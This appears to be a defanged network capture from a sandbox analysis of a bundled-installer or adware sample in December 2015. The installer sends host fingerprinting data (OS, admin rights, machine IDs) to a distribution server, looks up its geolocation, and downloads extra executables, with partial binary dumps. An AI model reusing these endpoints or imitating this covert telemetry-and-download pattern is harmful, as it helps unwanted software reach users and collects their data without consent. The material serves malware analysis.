s.5#.>5.s.5Rich.s.5........................PE..L.....`V..........".
.....@........................@.................................?.....
@......................... ...R...D...........D...................0...
....................................0...H...................l...`.....
..............UPX0....................................UPX1.....@......
.<..................@....rsrc................@..............@......
......................................................................
......................................................................
......................................................................
......................................................................
................3.91.UPX!....^.t.(...f....7......&.......USVW.t$..|$..
D$........]......................4$.|$..D$..\$.....x........Z.........
a....R......2...n...@......... ..J$.........P...P...@p'..).....=......
.................._..O....W...P..S..QR.G.._..O..@.... ._$.O(,K..@0._4.
O8<w.....@.d$..h...^..N..~...1......L$.....$.V..^..N..~......... f.
..M....P.....1.1..\$`...!..T$.1..\$ 1.................(.1.W.y.........
u.1..-........$..#D$...1............t...........$.D*..u....v....hE....
.1...........1.1......$. ....|..1.,.............l....xq.......Y.$d
<<< skipped >>>


POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.lawfuldownload.com
Content-Length: 566
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=6FE5DDD064E91F40D31A83BB9FE8886E&Sysid1=6FE5DDD064E91F40D31A83BB9FE8886E&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=14991&cmdl=amisetup9364__14991.exe /s  /ver 1.1.2.41  /u http://VVV.lawfuldownload.com/index.php /ta /ci 14991 /i OperaWW&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup9364__14991&ffver=&i=OperaWW&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA4AA==&netfs=3&s=Y&ts=1450553044&ver=1.1.2.41
HTTP/1.1 200 OK
Access-Control-Allow-Origin: hXXp://VVV.somauto.com
Content-Type: text/html; charset=UTF-8
Date: Sat, 19 Dec 2015 19:24:08 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
21f1....      ..      ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
1 Transitional//EN">.<html>.    <head>.        <meta
 http-equiv="content-type" content="text/html; charset=UTF-8" /> . 
       <title>Installer</title>.        <base href="htt
p://VVV.lawfuldownload.com:80/index.php" />.        <script type
="text/javascript" src="hXXp://cdn1.lawfuldownload.com/V32/amipb.js"&g
t;</script>.        <script type="text/javascript">.      
      var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_addit
ional_offer_list = '0';.            var g_finish_install_button = '0';
.            var g_popup_install_all = '0';.            var g_eula = '
';.            var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_c
id=14991&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie
&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3';.            var g_
icon = '';.            var g_comps = [], g_pages = [], c, g_curPage = 
-1;.            var g_cid = '14991';.            var g_tid = '';.     
       var g_cc = 'UA';.            var g_lang = 'en';.            var
 g_ip = '194.242.96.218';.            var g_browser = 'ie';.          
  var g_cnt = '555f6b6bb91130422fa60fa6f0d0e42d';.            var g_ve
r = '1.1.2.41';.            var g_buttonImage = 1;.            var g_t
hanks = 'thankyou.php';.            var g_images = [];.            var
 g_purl = 'hXXp://VVV.lawfuldownload.com:80/pix.php';.            var 
g_skipCats = 0;.            var g_ieVer = '6.0';.            var g
<<< skipped >>>

POST /finalize.php HTTP/1.1


Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.lawfuldownload.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.lawfuldownload.com
Content-Length: 203
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=14991&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_OperaWW=2&updater=3&OperaWW=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Sat, 19 Dec 2015 19:24:08 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 1599
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps></comps><short_name&
gt;</short_name><must_show>0</must_show><bdy>P
GlucHV0IHR5cGU9ImhpZGRlbiIgdmFsdWU9IjEiIGlkPSJpX2FtaV91cGRhdGVyIi8 PGl
ucHV0IHR5cGU9ImhpZGRlbiIgdmFsdWU9InVwZGF0ZXIiIGlkPSJhbGxfc2hvcnRfbmFtZ
XMiLz4=</bdy><img>__empty__</img></page><pa
ge><f>1</f><fb>0</fb><pt>1</pt>
<cats>0</cats><updh>1</updh><wrn></wr
n><comps></comps><short_name></short_name>&
lt;must_show>0</must_show><bdy>DQo8ZGl2IHN0eWxlPSJ3aWR0
aDoxMDAlO21hcmdpbi1sZWZ0OjA7bWFyZ2luLXRvcDoxMCI PGI SW5zdGFsbGF0aW9uIH
N0YXR1czwvYj48YnIvPjxici8 DQpQbGVhc2Ugd2FpdCB3aGlsZSB0aGUgaW5zdGFsbGVy
IHdpemFyZCBkb3dubG9hZHMgYW5kIG9wdGltaXplcyB0aGUgbmVjZXNzYXJ5IHBhY2thZ2
VzLjxici8 DQpUeXBpY2FsbHksIHRoaXMgcHJvY2VzcyB0YWtlcyBubyBsb25nZXIgdGhh
biBvbmUgbWludXRlLg0KPC9kaXY DQo8ZGl2IHN0eWxlPSJ3aWR0aDoxMDAlO21hcmdpbi
1sZWZ0OjA7bWFyZ2luLXRvcDozMCI RG93bmxvYWQgcHJvZ3Jlc3M8L2Rpdj4NCjxkaXYg
c3R5bGU9IndpZHRoOjkwJTttYXJnaW4tbGVmdDoyMDttYXJnaW4tdG9wOjEwIiBpZD0iZG
93bmxvYWRfcHJvZ3Jlc3NfaG9zdCI PC9kaXY DQo8ZGl2IHN0eWxlPSJ3aWR0aDoxMDAl
O21hcmdpbi1sZWZ0OjA7bWFyZ2luLXRvcDo1MCI SW5zdGFsbGF0aW9uIHByb2dyZXNzPC
9kaXY DQo8ZGl2IHN0eWxlPSJ3aWR0aDo5MCU7bWFyZ2luLWxlZnQ6MjA7bWFyZ2luLXRv
cDoxMCIgaWQ9Imluc3RhbGxfcHJvZ3Jlc3NfaG9zdCI PC9kaXY DQo8ZGl2IHN0eW
<<< skipped >>>


GET /pub/.custom/ABTest/win/Opera_34.0.2036.41_Setup.exe HTTP/1.1
User-Agent: Opera NetInstaller/34.0.2036.25
Connection: Keep-Alive
Cache-Control: no-cache
Host: get.geo.opera.com.global.prod.fastly.net


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-msdos-program
Last-Modified: Tue, 15 Dec 2015 12:06:03 GMT
Content-Length: 36140440
Accept-Ranges: bytes
Date: Sat, 19 Dec 2015 19:24:32 GMT
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: cache-fra1226-FRA
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1450553072.596797,VS0,VE0
MZ......................@...................................@.........
..!..L.!This program cannot be run in DOS mode....$..........f.s.5.s.5
.s.5..'5.s.5.!?5.s.5.!.5js.5.!.5.s.5K..5.s.5K.05.s.5K.15.s.5.".5.s.5K.
 5.s.5.s.5,r.5.s.5.s.5#..5.s.5#..5[s.5#..5.s.5#.<5.s.5.!;5.s.5.sw5.
s.5#.>5.s.5Rich.s.5........................PE..L...Z.nV..........".
.....2...................P....@...................................'...
@.........................@...R.......h........y.......... ]'.x....@..
`d...V......................0...........@............P..........`.....
...............text....0.......2.................. ..`.rdata.......P..
.....6..............@..@.data....y...0... ..................@....tls..
...............(..............@....rsrc....y.......z...*..............
@..@.reloc..`d...@...f..................@..B..........................
......................................................................
......................................................................
..................................................USVW.t$..|$..D$.....
...]..................4$.|$..D$..\$.....N....Z.........a....R.........
2........@........... ..J$.........P.....P........p'..).=.............
..................._..O....W...P..S..QR.G.._..O....W...P..S..QR.G ._$.
O(...W,..P..S..QR.G0._4.O8...W<..P..S..QR..@.d$..|$h...^..N..~..\$.
1..L$..|$...$.V..^..N..~..\$..L$..|$ f....t$.....|$.1.1..\$`...!..T$.1
..\$ 1..............|$.1..D$..d$.....u.1..T$.1........$..#D$...1......
..t...........$..........v....t$h........1.......1.1......$.......
<<< skipped >>>


GET /xml HTTP/1.1
User-Agent: WinHttpClient
Host: ip-api.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: application/xml
Date: Sat, 19 Dec 2015 19:23:52 GMT
Content-Length: 593
<?xml version="1.0" encoding="UTF-8"?>.<query>..<status
><![CDATA[success]]></status>..<country><![CDA
TA[Ukraine]]></country>..<countryCode><![CDATA[UA]]&
gt;</countryCode>..<region><![CDATA[63]]></region
>..<regionName><![CDATA[Kharkivs'ka Oblast']]></regi
onName>..<city><![CDATA[Kharkiv]]></city>..<zi
p><![CDATA[]]></zip>..<lat><![CDATA[49.9935]]&
gt;</lat>..<lon><![CDATA[36.2304]]></lon>..<
;timezone><![CDATA[Europe/Kiev]]></timezone>..<isp&g
t;<![CDATA[Pitline Ltd]]></isp>..<org><![CDATA[Pi
tline Ltd]]></org>..<as><![CDATA[AS31561 Pitline Ltd
]]></as>..<query><![CDATA[194.242.96.218]]></q
uery>.</query>HTTP/1.1 200 OK..Access-Control-Allow-Origin: *
..Content-Type: application/xml..Date: Sat, 19 Dec 2015 19:23:52 GMT..
Content-Length: 593..<?xml version="1.0" encoding="UTF-8"?>.<
query>..<status><![CDATA[success]]></status>..<
;country><![CDATA[Ukraine]]></country>..<countryCode
><![CDATA[UA]]></countryCode>..<region><![CDAT
A[63]]></region>..<regionName><![CDATA[Kharkivs'ka O
blast']]></regionName>..<city><![CDATA[Kharkiv]]>
</city>..<zip><![CDATA[]]></zip>..<lat>&
lt;![CDATA[49.9935]]></lat>..<lon><![CDATA[36.23
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 19 Nov 2015 23:18:43 GMT
Accept-Ranges: bytes
ETag: "808bbea12023d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
1401D12320A2285D79HTTP/1.1 200 OK..Cache-Control: max-age=604800..Cont
ent-Type: text/plain..Last-Modified: Thu, 19 Nov 2015 23:18:43 GMT..Ac
cept-Ranges: bytes..ETag: "808bbea12023d11:0"..Server: Microsoft-IIS/7
.5..X-Powered-By: ASP.NET..Content-Length: 18..Date: Sat, 19 Dec 2015 
19:25:12 GMT..Connection: keep-alive..X-CCC: UA..X-CID: 2..1401D12320A
2285D79....


GET /msdownload/update/v3/static/trustedr/en/B1BC968BD4F49D622AA89A81F2150152A41D829C.crt HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 889
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0..u0..]..............KZ..0...*.H........0W1.0...U....BE1.0...U....Glo
balSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0...980901
120000Z..280128120000Z0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...
U....Root CA1.0...U....GlobalSign Root CA0.."0...*.H.............0....
............O.~....%k.H..*.......c..gf.....H ......).e...-....Lp..=.0.
..O....P...P......R..}.m.50.^Cs.A..j...:V98o.<.i[*M..T.l....<...
...<.x...tn.Da...F.u......ml.x......8..$.OsT...:...4.....w.... ...S
n..{7t.pG."Qc.y...A&... .F.H.d*..4.,*.l.CJ....|.!h...R...........B0@0.
..U...........0...U.......0....0...U......`{f.E....P/}..4....K0...*.H.
.............s.|Ov.......4.(2.|.l., ...S.k^..H......=aM.F..>...cU..
...9.C.8../.&;..PV....8...pQ......_.....A..]ud...U0......,.cF.....i...
Hd......).........i,i$x....qb......]...G.n*.V1..g.. .l.]F......Q.p..V=
a.j.\...=.A...cR.SS. ......_..A..........o. .......fU..H.)&i.HTTP/1.1 
200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Thu, 
23 Jul 2015 23:16:35 GMT..Accept-Ranges: bytes..ETag: "80b4b9e9dc5d01:
0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 
889..Date: Sat, 19 Dec 2015 19:25:12 GMT..Connection: keep-alive..X-CC
C: UA..X-CID: 2..0..u0..]..............KZ..0...*.H........0W1.0...U...
.BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign 
Root CA0...980901120000Z..280128120000Z0W1.0...U....BE1.0...U....Globa
lSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0.."0...*.H.
............0................O.~....%k.H..*.......c..gf.....H ....
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 19 Nov 2015 23:18:43 GMT
Accept-Ranges: bytes
ETag: "808bbea12023d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
1401D12320A2285D79....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/octet-stream
Last-Modified: Fri, 20 Nov 2015 00:02:21 GMT
Accept-Ranges: bytes
ETag: "80a431ba2623d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49695
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I.......l.........sGe. .authroot.s
tl.|.V.C9..CK...<T.......%....^..!OD.....N.l.Gy4*.GI.H%.$.........D
H.$%[.gF.t..{..._....9..;3.....r..n.oy.q*....y`vB.8_E..&.0..r..*...DX!
.y...S..F.8....y4.....`...f.$p.....y.N.a.l..a.U.0Mu..?}.....!.{...t..b
u.7)....M.............?.;.g...P.)..a..._..O....k...-.G.Q.)w.1!..[...k'
..!;kT...&..=.E....I!..N. .yu......4.Z5.$Wx.[.t...i~..Ht..Opc ..3....B
. (..k.0H.... zK......=k..........A....... ..A(u.!...1Z.I`.s,\./..<
..sY....;.w91^d.....zXY.Y8.<,........xU..:/.;..N.....jB..j...i.tE..
...1*k...V.mP..Z......C.....Kc.....j.......-..l.....[mA .n.......AO .J
..7iy.z.`.5...:..S...J....Y..Z..je...5..8.~.2...n.&\...Z>.....WJ...
.....q.[.n...3J...fy.......T...I.olj.A.1....N....<..A....i...?.6s.1
.Q.C....X........n?.e...7>..T......v.;.....<.NKql...].....qhN.~.
i....FS..-4.e.$o))...Z"..z2.n...[~ ..B(...N..!.....5<-WB.L..Q.5.U.0
j?...9.5.b.7_o.|.|...o|S.g.1......cW..../...7>h<..::c&<..!..a
d...v.-.D..E......*.3. R`,.....-.DF./......"[`z8.F.$.@.A...e..&\Ea.."B
D6..e..8X.I.^v6.^].j.b...H!E...8^..SB!......`..|Q.=..N...[3..>,7D..
F:..a6.o..2....d'...............!k...%.y..:.?.4#./..4....*....|...G..2
....z.Y.&..0*...p..f!@..-...5..z...' ..{Of.c.....Q....7f...XI.|.......
xXX9E...M....h.a..b.}j..@.. ....#bYW...sl...;~R1'K..Wr.:}.......P#....
...@h~..<....[......|.~.<=.O.....%.)*t*B.q.Q...^.........Da.^Ie.
.....)..{W.....R._................g.2..B....1..IK..=1sn...n....'..8.8.
L.c..........%..dP....tI3....Pz[..K.#..~..;..n....1L"L/$.yj..k..O.
<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/octet-stream
Last-Modified: Fri, 20 Nov 2015 00:02:21 GMT
Accept-Ranges: bytes
ETag: "80a431ba2623d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49695
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I.......l.........sGe. .authroot.s
tl.|.V.C9..CK...<T.......%....^..!OD.....N.l.Gy4*.GI.H%.$.........D
H.$%[.gF.t..{..._....9..;3.....r..n.oy.q*....y`vB.8_E..&.0..r..*...DX!
.y...S..F.8....y4.....`...f.$p.....y.N.a.l..a.U.0Mu..?}.....!.{...t..b
u.7)....M.............?.;.g...P.)..a..._..O....k...-.G.Q.)w.1!..[...k'
..!;kT...&..=.E....I!..N. .yu......4.Z5.$Wx.[.t...i~..Ht..Opc ..3....B
. (..k.0H.... zK......=k..........A....... ..A(u.!...1Z.I`.s,\./..<
..sY....;.w91^d.....zXY.Y8.<,........xU..:/.;..N.....jB..j...i.tE..
...1*k...V.mP..Z......C.....Kc.....j.......-..l.....[mA .n.......AO .J
..7iy.z.`.5...:..S...J....Y..Z..je...5..8.~.2...n.&\...Z>.....WJ...
.....q.[.n...3J...fy.......T...I.olj.A.1....N....<..A....i...?.6s.1
.Q.C....X........n?.e...7>..T......v.;.....<.NKql...].....qhN.~.
i....FS..-4.e.$o))...Z"..z2.n...[~ ..B(...N..!.....5<-WB.L..Q.5.U.0
j?...9.5.b.7_o.|.|...o|S.g.1......cW..../...7>h<..::c&<..!..a
d...v.-.D..E......*.3. R`,.....-.DF./......"[`z8.F.$.@.A...e..&\Ea.."B
D6..e..8X.I.^v6.^].j.b...H!E...8^..SB!......`..|Q.=..N...[3..>,7D..
F:..a6.o..2....d'...............!k...%.y..:.?.4#./..4....*....|...G..2
....z.Y.&..0*...p..f!@..-...5..z...' ..{Of.c.....Q....7f...XI.|.......
xXX9E...M....h.a..b.}j..@.. ....#bYW...sl...;~R1'K..Wr.:}.......P#....
...@h~..<....[......|.~.<=.O.....%.)*t*B.q.Q...^.........Da.^Ie.
.....)..{W.....R._................g.2..B....1..IK..=1sn...n....'..8.8.
L.c..........%..dP....tI3....Pz[..K.#..~..;..n....1L"L/$.yj..k..O.
<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/B1BC968BD4F49D622AA89A81F2150152A41D829C.crt HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 889
Date: Sat, 19 Dec 2015 19:25:12 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0..u0..]..............KZ..0...*.H........0W1.0...U....BE1.0...U....Glo
balSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0...980901
120000Z..280128120000Z0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...
U....Root CA1.0...U....GlobalSign Root CA0.."0...*.H.............0....
............O.~....%k.H..*.......c..gf.....H ......).e...-....Lp..=.0.
..O....P...P......R..}.m.50.^Cs.A..j...:V98o.<.i[*M..T.l....<...
...<.x...tn.Da...F.u......ml.x......8..$.OsT...:...4.....w.... ...S
n..{7t.pG."Qc.y...A&... .F.H.d*..4.,*.l.CJ....|.!h...R...........B0@0.
..U...........0...U.......0....0...U......`{f.E....P/}..4....K0...*.H.
.............s.|Ov.......4.(2.|.l., ...S.k^..H......=aM.F..>...cU..
...9.C.8../.&;..PV....8...pQ......_.....A..]ud...U0......,.cF.....i...
Hd......).........i,i$x....qb......]...G.n*.V1..g.. .l.]F......Q.p..V=
a.j.\...=.A...cR.SS. ......_..A..........o. .......fU..H.)&i.HTTP/1.1 
200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Thu, 
23 Jul 2015 23:16:35 GMT..Accept-Ranges: bytes..ETag: "80b4b9e9dc5d01:
0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 
889..Date: Sat, 19 Dec 2015 19:25:12 GMT..Connection: keep-alive..X-CC
C: UA..X-CID: 2..0..u0..]..............KZ..0...*.H........0W1.0...U...
.BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign 
Root CA0...980901120000Z..280128120000Z0W1.0...U....BE1.0...U....Globa
lSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0.."0...*.H.
............0................O.~....%k.H..*.......c..gf.....H ....
<<< skipped >>>


GET /download2/Bundle.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: osdsoft.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Dec 2015 19:23:25 GMT
Content-Type: application/octet-stream
Content-Length: 312832
Last-Modified: Fri, 18 Dec 2015 16:23:20 GMT
Connection: keep-alive
ETag: "567432f8-4c600"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........r.........
....=.......=.......=................................8.......8........
.......8......Rich............PE..L.....nV.....................2......
vA............@.......................................@...............
..................l...(....`..........................................
........................@...............@............................t
ext............................... ..`.rdata...y.......z..............
....@..@.data...X2... ......................@....rsrc........`....... 
..............@..@.reloc..............................@..B............
......................................................................
......................................................................
......................................................................
......................................................................
..............................................!...5h B..5$!B.....A.P..
..A.....u.P.F&.....3...................T$.S.\$.V3.3.....t.3.8.......t.
@F...<..u..|...t....F....^[......L$...1B....E...1B.....t...$...... 
u.@..1B.....u.3......t....d$... t.@..1B.....u..........1B.............
.......h|.A..t$...,.....................T$.S..3...t..I........Z..R...H
.....u.[.........W.|$.3....3.f..t.V..........tW..R...H...f..u.^_..T$..
.t..D$.V.t$. .......@.Ju.^..T$...t..D$.V.t$. .......@.Ju.^..D$....D$..
..d$...:.u ..t..P.:Q.u.........u.3.3............3.................
<<< skipped >>>


GET /DigiCertHighAssuranceEVRootCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl4.digicert.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 19 Dec 2015 19:25:15 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 543
Connection: keep-alive
X-CFHash: "6dc8468be3e33e48f13ae2dc8ae60dd4"
Last-Modified: Wed, 16 Dec 2015 22:15:03 GMT
CF4ttl: 31536000.000
X-CF3: M
CF4Age: 0
CF-S: V
X-CF2: H
Server: CFS 0213
X-CF1: 13483:fB.fra2:cf:cacheA.fra2-v:H
Accept-Ranges: bytes
0...0......0...*.H........0l1.0...U....US1.0...U....DigiCert Inc1.0...
U....VVV.digicert.com1 0)..U..."DigiCert High Assurance EV Root CA..15
1216210000Z..160106210000Z010/....................061110000100Z0.0...U
........00.0...U.#..0....>.i...G...&....cd .0...U........0...*.H...
...............9:.".yw...>|....bS2qY..1D.....g.....Oq..e.Hk....V...
h.8}(.M.p.tT.2O..@ZD....9l.L...;..J..XZ..F..>..Ji..0..*...h..c..3G.
.....*....j~..8..|.R$....|u.-S....Tr.........MA9......Ki.(u..S....Z...
..}m...4'&.....fQH..c........`Q....`..#9.t..H.9... ?......r...HTTP/1.1
 200 OK..Date: Sat, 19 Dec 2015 19:25:15 GMT..Content-Type: applicatio
n/x-pkcs7-crl..Content-Length: 543..Connection: keep-alive..X-CFHash: 
"6dc8468be3e33e48f13ae2dc8ae60dd4"..Last-Modified: Wed, 16 Dec 2015 22
:15:03 GMT..CF4ttl: 31536000.000..X-CF3: M..CF4Age: 0..CF-S: V..X-CF2:
 H..Server: CFS 0213..X-CF1: 13483:fB.fra2:cf:cacheA.fra2-v:H..Accept-
Ranges: bytes..0...0......0...*.H........0l1.0...U....US1.0...U....Dig
iCert Inc1.0...U....VVV.digicert.com1 0)..U..."DigiCert High Assurance
 EV Root CA..151216210000Z..160106210000Z010/....................06111
0000100Z0.0...U........00.0...U.#..0....>.i...G...&....cd .0...U...
.....0...*.H..................9:.".yw...>|....bS2qY..1D.....g.....O
q..e.Hk....V...h.8}(.M.p.tT.2O..@ZD....9l.L...;..J..XZ..F..>..Ji..0
..*...h..c..3G......*....j~..8..|.R$....|u.-S....Tr.........MA9......K
i.(u..S....Z.....}m...4'&.....fQH..c........`Q....`..#9.t..H.9... ?...
...r.....
<<< skipped >>>


GET /favicon/wikipedia.ico HTTP/1.1
Host: bits.wikimedia.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.41
Accept-Encoding: gzip, deflate, lzma, sdch
Accept-Language: en-US,en;q=0.8


HTTP/1.1 301 TLS Redirect
Server: Varnish
Location: hXXps://bits.wikimedia.org/favicon/wikipedia.ico
Content-Length: 0
Accept-Ranges: bytes
Date: Sat, 19 Dec 2015 19:25:10 GMT
X-Varnish: 730647640
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: cp3007 frontend (0)
Set-Cookie: WMF-Last-Access=19-Dec-2015;Path=/;HttpOnly;Expires=Wed, 20 Jan 2016 12:00:00 GMT
X-Client-IP: 194.242.96.218
Set-Cookie: GeoIP=UA:::50.45:30.52:v4; Path=/; Domain=.wikimedia.org



GET /DigiCertGlobalRootCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl3.digicert.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Content-Type: application/x-pkcs7-crl
Date: Sat, 19 Dec 2015 19:25:14 GMT
Etag: "516059267"
Expires: Mon, 21 Dec 2015 19:25:14 GMT
Last-Modified: Wed, 16 Dec 2015 22:15:03 GMT
Server: ECS (ams/499B)
X-Cache: HIT
Content-Length: 531
0...0.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U
....VVV.digicert.com1 0...U....DigiCert Global Root CA..151216210000Z.
.160106210000Z010/....................061110000100Z0.0...U........00.0
...U.#..0.....P5V.L.f........=.U0...U........0...*.H..............g..C
.i:..(.v..........T.p...3.}.M.G...F....DE{.E...Y.^P..1)Kf&P.xtO3..#.(.
D>.?o.I.)`G.W.s...V.A.#8..............l...t....d.e...H:b...jB[.....
.....4.n......6\......;.\'........'..c.!...L..8q..v....;gj|......s...[
.X...W%'&l."..~.x.Xa.. mmG ...f.n .0.6....BHHTTP/1.1 200 OK..Accept-Ra
nges: bytes..Cache-Control: max-age=172800..Content-Type: application/
x-pkcs7-crl..Date: Sat, 19 Dec 2015 19:25:14 GMT..Etag: "516059267"..E
xpires: Mon, 21 Dec 2015 19:25:14 GMT..Last-Modified: Wed, 16 Dec 2015
 22:15:03 GMT..Server: ECS (ams/499B)..X-Cache: HIT..Content-Length: 5
31..0...0.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0
...U....VVV.digicert.com1 0...U....DigiCert Global Root CA..1512162100
00Z..160106210000Z010/....................061110000100Z0.0...U........
00.0...U.#..0.....P5V.L.f........=.U0...U........0...*.H..............
g..C.i:..(.v..........T.p...3.}.M.G...F....DE{.E...Y.^P..1)Kf&P.xtO3..
#.(.D>.?o.I.)`G.W.s...V.A.#8..............l...t....d.e...H:b...jB[.
.........4.n......6\......;.\'........'..c.!...L..8q..v....;gj|......s
...[.X...W%'&l."..~.x.Xa.. mmG ...f.n .0.6....BH....
<<< skipped >>>

